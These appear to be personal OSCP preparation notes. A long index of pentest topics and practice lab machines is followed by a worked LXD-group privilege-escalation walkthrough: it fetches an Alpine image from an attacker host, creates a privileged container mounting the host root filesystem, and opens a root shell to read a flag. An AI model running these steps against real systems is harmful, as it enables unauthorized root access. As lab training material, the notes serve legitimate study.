Index

My OSCP Preparation Notes

  1. Scanning
    1. Recon
      1. network
      2. web
        1. gobuster
        2. wfuzz
        3. webdav
        4. jenkin
    2. Nmap
      1. My way
        1. TCP
          1. Step1-Live host
          2. Step2-nmap Full port scan
          3. Step3-Run nmap Full port scan
          4. Step4-nmap Open port scan
          5. Step5-Run Open port scan
        2. UDP
          1. Step2-nmap Full port scan
          2. Step3-Run nmap Full port scan
          3. Step4-nmap Open port scan
          4. Step5-Run Open port scan
        3. FinalScanPart1
        4. FinalScanPart2
    3. Port Knock
  2. Enumeration
    1. HTTP
      1. Gobuster
      2. Nikto
      3. dirsearch
      4. WFuzz
        1. wfuzz username
      5. Command Injection
      6. Login Bypass
      7. Droopal Scan
      8. SSRF
      9. Hydra post form
      10. cewl
    2. FTP-21
      1. Download file from ftp
      2. Autobind ftp when ftp is permission denied for local user
      3. Remeber while uploading file on ftp
    3. SSH
      1. SSH Tunneling / Pivoting
      2. enum_ssh
      3. rbash shell esacping
      4. Login with RSA
      5. Decrypt RSA
      6. When bruteforcing hydra don't work
      7. lshell bypass
      8. different shell and their errors
      9. port kncoking
    4. SMB
      1. Check smb version
    5. SNMP
      1. snmp_enum
      2. onesixyone scanning for ips
    6. MS SQL
      1. Microsoft_sql_enum
      2. Error based SQL
      3. boolean based
      4. Time based SQLi
      5. SQL Injection (SQL MAP)
      6. Blind sql
    7. finger_enum_user.sh
      1. Enum Image
    8. Telnet
    9. Pop3
    10. CMS
    11. Uncommon Port Exploitation search/Enum
    12. Steg extract
    13. RDP
    14. James 4555
    15. MDB tool
    16. OS
      1. linux
        1. commands
        2. tty
        3. basic enumeration
        4. suid
        5. cron
        6. grep
      2. windows
        1. basic commands
        2. samba version
        3. search
        4. version
  3. Shell
    1. msfvenom
      1. msf
    2. windows
    3. shell
    4. one liner
      1. php
      2. one liner
      3. infosec one liner
    5. powershell
    6. MSFVenom & Metasploit
      1. MSFVenom-payload
        1. Windows
        2. Linux
        3. Web Payload
        4. Binaries
      2. Metasploit
        1. meterpreter
        2. Meterpreter shell code
        3. MsfVenom Handler
      3. Netcat on windows
  4. Intrective shell
    1. Pseudo shell
      1. python
      2. bash
      3. awk
      4. perl
      5. ruby
      6. lua
      7. IRB
      8. tcpdump
      9. vi
      10. nmap
    2. Full intractive shell
      1. Magic on netcat
    3. Reverse shell
      1. bash
      2. python
      3. ruby
      4. Java
      5. Telnet
      6. netcat
      7. PHP
      8. Gawk
      9. URL reverseshell
      10. bypass & os command php
      11. curl
    4. Reverse Shell with Powercat
  5. File Transfer
    1. tftp
    2. http
    3. linux
    4. windows
    5. scp
    6. Transfer
      1. Windows
        1. Pwershell
        2. Cert Util
        3. TFTP
        4. SCP
        5. netcat
        6. Debug
        7. bitsadmin
        8. smb
        9. rdp
      2. Linux
        1. FTP
        2. TFTP
        3. SCP
        4. netcat
        5. curl
        6. Wget
        7. With no tool
  6. WINDOWS - Privilege Escalation
    1. WINDOWS - Sharup Results
    2. WINDOWS - Kernel
    3. WINDOWS - Services (Binpath)
    4. WINDOWS -Services (Unquoted path)
    5. WINDOWS - Services (Registry)
    6. WINDOWS - Registry (Autorun)
    7. WINDOWS - Registry(AlwaysInstallElevated
    8. WINDOWS - PasswordMining (Memory)
    9. WINDOWS -Password (Registry)
    10. WINDOWS - Password (config files)
    11. WINDOWS -Scheduled task (Missing binary)
    12. WINDOWS -Startup Application
    13. WINDOWS - Passthehash
    14. WINDOWS - Unquoted Path Service
      1. adding new user
      2. rdp and stickykeys
    15. WINDOWS - (AlwaysInstallElevated)
      1. 1st method - msfvenom
      2. 2nd method - administrator
      3. 3rd way via msf
    16. WINDOWS - Automated Script
      1. Windows-Exploit-suggester
      2. Windows Gather Applied Patches
      3. Sherlock
      4. JAWS – Just Another Windows (Enum) Script
      5. powerup
    17. My Priv esc tech (Windows)
      1. mimiketz if discover protected SID files
      2. Login with obtained creds with psexec and powershell & smbclient
      3. Finding permission & actual file path of shortcut file or .lnk file
      4. icacls & cacls for find file & folder permissions and Edit permission
      5. Discovered VM on target loaction
      6. Discoverd .mdb backup
      7. Discovered .kdbx Keepass database
      8. search file recursively
      9. List hidden files
      10. Got .dmp file extract with volatality
      11. group.xml file with enocded password
      12. Get that "pass" out of the ADS backup.zip
      13. disable firewall enable rdp
      14. Finding windows version from a file
      15. got SAM System file use pwdump to dump hashes
      16. Windows
        1. Ebowla + Token Impersonation
        2. Non intractive powershell file execution
        3. add user
        4. Convert Ptython2exe
        5. Manual Priv Check
        6. audit priv
  7. LINUX - Privilege Escalation
    1. LINUX - /etc/passwd -deeply
      1. openssl
      2. python
      3. perl
      4. mkpasswd
      5. php
    2. LINUX - Sudo -deeply
      1. Traditional Method to assign Root Privilege
      2. Default Method to assign Root Privilege
      3. find - Allow Root Privilege to Binary commands
      4. Allow Root Privilege to Binary Programs - Spawn shelll
        1. perl
        2. python
        3. less
        4. awk - spawn
        5. man
        6. vi
        7. Allow Root Privilege to Shell Script
        8. bash script - spawn
        9. python script - spawn
        10. c script - spawn
        11. Allow Sudo Right to other Programs
        12. Env
        13. ftp
        14. socat
        15. scp
    3. LINUX - SUID - NMAP
    4. LINUX - LD_Preload
    5. LINUX - SUID - vim-tiny
    6. LINUX -writable
      1. cron
    7. LINUX -CRON
      1. cron
    8. LINUX - Automated Script
      1. linenum
      2. Linuxprivchecker
      3. linuxexploitsuggester2
      4. Bashark
      5. beroot
    9. LINUX - capabilities capability
      1. caoability
    10. LINUX - Binaries for escalation
      1. zip
      2. wget
        1. passwd entry
      3. wget -2
      4. cat
      5. time
      6. Taskset
      7. git
      8. cp
      9. tmux
      10. tmux -2
      11. ed
      12. sed
      13. pip
      14. lxd
      15. socat
      16. scp
      17. capabilities
      18. perl
      19. docker
      20. perl -2
      21. tmp.py
      22. vi
      23. systemctl
      24. tar
      25. id-disk
      26. id-games
      27. python
      28. crontab
      29. tcpdump
      30. strace
      31. ssh
      32. make
      33. wine
      34. ftp
      35. micro
      36. mysql
      37. Simon
      38. tcpdump
      39. ht
      40. sls
      41. apt-get
      42. ed
      43. mawk
    11. LINUX - Exploiting SUDO CVE-2019-14287
  8. Buffer Overflow
    1. Minishare - Exploitation
    2. Brain Pan - Exploitation
  9. bruteforce
    1. ssh
    2. rdp
    3. ftp
    4. hashcat
    5. gpp-decrypt
    6. wp
    7. john
    8. hydra
    9. cewl and crunch
    10. medusa
    11. ncrack
    12. wfuzz
    13. fcrackzip
    14. keepass
    15. password Cracking
      1. zip
      2. NTLM
      3. /etc/shadow
      4. kbd keepass
      5. RSA Decrypting
      6. SHA512 $6$ shadow file
      7. MD5 $1$ shadow file
      8. john RAW MD5
      9. MD5 Apache webdav file $arp1$
      10. SHA1
      11. Auth Proxy
      12. WordPress (PHPASS) windows
      13. Crack MD5 windows
      14. $5$
      15. $krb5tgs$23$ Kerberos 5 hash
  10. compiling
  11. Tunneling
  12. Imp Tools

OSCP Practice (HTB & Vulnhub)

  1. HTB - linux
    1. tartarsauce
    2. nineveh
    3. haircut
    4. sunday
    5. poison
    6. swagshop
  2. HTB - windows
    1. legacy
    2. devel
    3. bastard
    4. optimum
    5. granny
    6. jeeves -juicypotato
    7. chatterbox
  3. HTB -ippsecc windows
    1. access
    2. active
    3. Arctic
    4. arkham
    5. bastard
    6. bastion
    7. blue
    8. bounty
    9. brainfuck
    10. chatterbox
    11. devel
    12. granny
    13. grandpa
    14. jeeves
    15. node
    16. kotarak
    17. lame
    18. legacy
    19. mantis
    20. netmon
    21. optimum
    22. querier
    23. secnotes
    24. oracle
  4. HTB -ippsecc linux
    1. Ariekei - docker
    2. Aragog - xxe
    3. Apocalyst - wp
    4. bank
    5. bart
    6. bashed
    7. beep
    8. bitlab
    9. blocky
    10. canape - db
    11. carrier
    12. chaos
    13. charon
    14. crimestoppers
    15. cronos
    16. curling
    17. dab - wfuzz
    18. DevOops
    19. Dropzone
    20. enterprise
    21. europa
    22. falafel
    23. flujab
    24. FluxCapacitor
    25. fortune - nfs
    26. FriendZone
    27. frolic - play
    28. haircut
    29. hawk
    30. haystack
    31. heist
    32. help
    33. irked
    34. jarvis
    35. lazy
    36. luke
    37. networked
    38. nibble
    39. nineveh
    40. zipper
    41. october
    42. onetwoseven
    43. oz
    44. poison
    45. popcorn
    46. sense
    47. shocker
    48. sneaky
    49. solidstate
    50. Stratosphere
    51. sunday
    52. swagshop
    53. tenten
    54. valentine
    55. waldo
    56. wall
    57. zetta
    58. teacher
    59. tatarsauce
    60. postman
  5. htbwithout msf - ranakhalil
    1. Bashed (linux)
    2. Devel (windows)
    3. Lame (linux)
    4. legacy (windows)
    5. Optimum (windows)
    6. Arctic (Windows)
    7. Shocker (linux)
    8. Valentine (linux)
    9. nibble (linux)
    10. cronos (linux)
    11. Blue (windows)
    12. Irked (linux)
    13. Friendzone (linux)
    14. brainfuck (linux)
    15. beep (linux)
    16. nineveh (linux)
    17. Active (Windows)
    18. sense (freebsd)
    19. solidstate (linux)
    20. node (linux)
    21. Poison (freebsd)
    22. Sunday (solaris)
    23. Swagshop (linux)
    24. Jarvis (linux)
    25. Networked (linux)
    26. TartarSauce (linux)
    27. LaCasaDePapel (linux)
    28. Hawk (linux) - drupal
    29. lightweight (linux)
    30. Devoops (linux)
    31. falafel (linux)
    32. kotarak (linux)
    33. bastard (windows)
    34. granny (windows)
    35. grandpa (windows)
    36. bounty (windows) gobuster - webconfig -juicy
    37. jerry (windows)
    38. chatterbox (windows)
    39. Sillo (windows)
    40. Conceal (Windows)
    41. Netmon (windows)
    42. jeeves (windows) jenkin
    43. bart (windows)
    44. tally (windows)
    45. jail
    46. safe
    47. bankrobber
  6. Vulnhub
    1. Bsides Vancouver
    2. raven 1
    3. raven 2
    4. acid 1
    5. violator
    6. troll 3
    7. pinkypalace v2
    8. pinkypalace v1
    9. digital world
      1. joy
      2. bravery
      3. mercy
      4. development
      5. torment
    10. skytower
    11. IMF
    12. troll1
    13. troll 2
    14. /dev/random sleepy
    15. BILLY MADISON
    16. wallabys-nightmare
    17. solidstate- james
    18. web developer - wp
    19. zico 1
    20. lin.security
    21. lord of the root - mysql udf
    22. pwnos 2.0
    23. sickos
    24. vulnos 2
    25. Mr. Robot 1
    26. stapler
    27. firstileaks
    28. kioptix 2014
    29. kioptix 1.3
    30. kioptix 1.2
    31. kioptix 1.1
    32. kioptix 1
    33. metasploitable 3
    34. metasplotiable 2
    35. metasploitable 1
  7. Vulnhub2
    1. sunset desk
    2. me and my gf 1
    3. sunset sunrise
    4. UA Literally vulnerable
    5. in plain sight 1
    6. HA: Dhanush
    7. HA: Chanakya
    8. djinn
    9. Jigsaw
    10. evm1
    11. mumbai 1
    12. gears-of-war-ep1
    13. chakravyuh
    14. ha-avengers-arsenal
    15. ha-naruto
    16. joker - joomla
    17. isro
    18. hackerfest
    19. bossplayersctf
    20. Misdirection
    21. armour
    22. ha-wordy- wordpress
    23. dc8
    24. silky
    25. sunset dawn
    26. sunset dawn
    27. Prime
    28. teuchter
    29. violator
    30. symfonos4
    31. dc-7 - drupal
    32. ai web 2
    33. hack 6 day
    34. digitalworld-localtorment
    35. hack-the-gemini-inc2
    36. dev-random-k2-vm-boot2root
    37. hack the gemini
    38. ai web 1
    39. hack-the-lin-security - mast
    40. oracle padding
    41. nezuko-1-vulnhub
    42. minu-v2
    43. digitalworld-local-joy
    44. symfonos2
    45. Matrix-3
    46. pumpkinraising
    47. symfonos1
    48. W1R3S.inc VM
    49. hack the de ice
    50. hack-kevgir
    51. vulnos-1
    52. dexter
    53. pwnlab
    54. sputnik-1 splunk
    55. dc1

lxd

A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.
LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. There are multiple methods to exploit this.
One of them is to use the LXD API to mount the host’s root filesystem into a container which is going to use in this post. This gives a low-privilege user root access to the host filesystem.


Introduction to LXD and LXC
Linux Container (LXC) are often considered as a lightweight virtualization technology that is something in the middle between a chroot and a completely developed virtual machine, which creates an environment as close as possible to a Linux installation but without the need for a separate kernel.
Linux daemon (LXD) is the lightervisor, or lightweight container hypervisor. LXD is building on top of a container technology called LXC which was used by Docker before. It uses the stable LXC API to do all the container management behind the scene, adding the REST API on top and providing a much simpler, more consistent user experience.


images\143-1.png


1. Steps to be performed on the attacker machine:
• Download build-alpine in your local machine through the git repository.
• Execute the script “build -alpine” that will build the latest Alpine image as a compressed file, this step must be executed by the root user.
• Transfer the tar file to the host machine

1. Steps to be performed on the host machine:
• Download the alpine image
• Import image for lxd
• Initialize the image inside a new container.
• Mount the container inside the /root directory


git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

images\143-2.png


images\143-3.png


cd /tmp
wget http://ip:8000/apline-v3.x.x.x.x

lxc image import ./apline-v3.x.x.x.x


images\143-4.png

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

mnt/root/root
ls
flag.txt
cat flag.txt


images\143-5.png